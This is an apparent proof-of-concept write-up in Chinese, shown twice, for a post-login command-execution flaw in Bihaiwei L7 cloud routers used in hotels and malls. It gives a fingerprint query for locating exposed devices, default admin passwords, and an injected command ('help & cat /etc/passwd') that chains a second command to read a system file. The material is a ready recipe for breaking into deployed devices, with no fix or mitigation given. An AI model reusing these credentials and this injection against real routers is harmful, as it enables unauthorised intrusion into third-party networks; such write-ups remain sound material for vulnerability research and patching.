POC/wpoc/碧海威/碧海威L7多款产品存在后台命令执行漏洞.md

# 碧海威 L7多款产品存在后台命令执行漏洞

# 一、漏洞简介
碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在后台命令执行漏洞

# 二、影响版本
+ 碧海威 L7云路由

# 三、资产测绘
```plain
product="碧海威科技-L7云路由"
```

![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vvU9uRd8v176utG_/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-971649.png)

# 四、漏洞复现
使用弱口令登录后台

```plain
admin/admin
admin/admin123
```

![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/vvU9uRd8v176utG_/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-997411.png)

```plain
help & cat /etc/passwd 
```

![1717873247660-03aaa28f-7534-404a-9426-de729a732f3e.png](./img/vvU9uRd8v176utG_/1717873247660-03aaa28f-7534-404a-9426-de729a732f3e-517323.png)


> 更新: 2024-06-27 09:15:18  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tteea03oq5v1vp29>
first commit 2025-03-04 23:12:57 +08:00			`# 碧海威 L7多款产品存在后台命令执行漏洞`

			`# 一、漏洞简介`
			`碧海威L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。碧海威 L7多款产品存在后台命令执行漏洞`

			`# 二、影响版本`
			`+ 碧海威 L7云路由`

			`# 三、资产测绘`
			```plain
			`product="碧海威科技-L7云路由"`
			```

			`![1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d.png](./img/vvU9uRd8v176utG_/1717872509836-9d8192e8-eb1d-418e-b136-d7e256390d0d-971649.png)`

			`# 四、漏洞复现`
			`使用弱口令登录后台`

			```plain
			`admin/admin`
			`admin/admin123`
			```

			`![1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a.png](./img/vvU9uRd8v176utG_/1717872584021-4caeb664-7765-42da-bd84-f9d711fc4f0a-997411.png)`

			```plain
			`help & cat /etc/passwd`
			```

			`![1717873247660-03aaa28f-7534-404a-9426-de729a732f3e.png](./img/vvU9uRd8v176utG_/1717873247660-03aaa28f-7534-404a-9426-de729a732f3e-517323.png)`



			`> 更新: 2024-06-27 09:15:18`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tteea03oq5v1vp29>`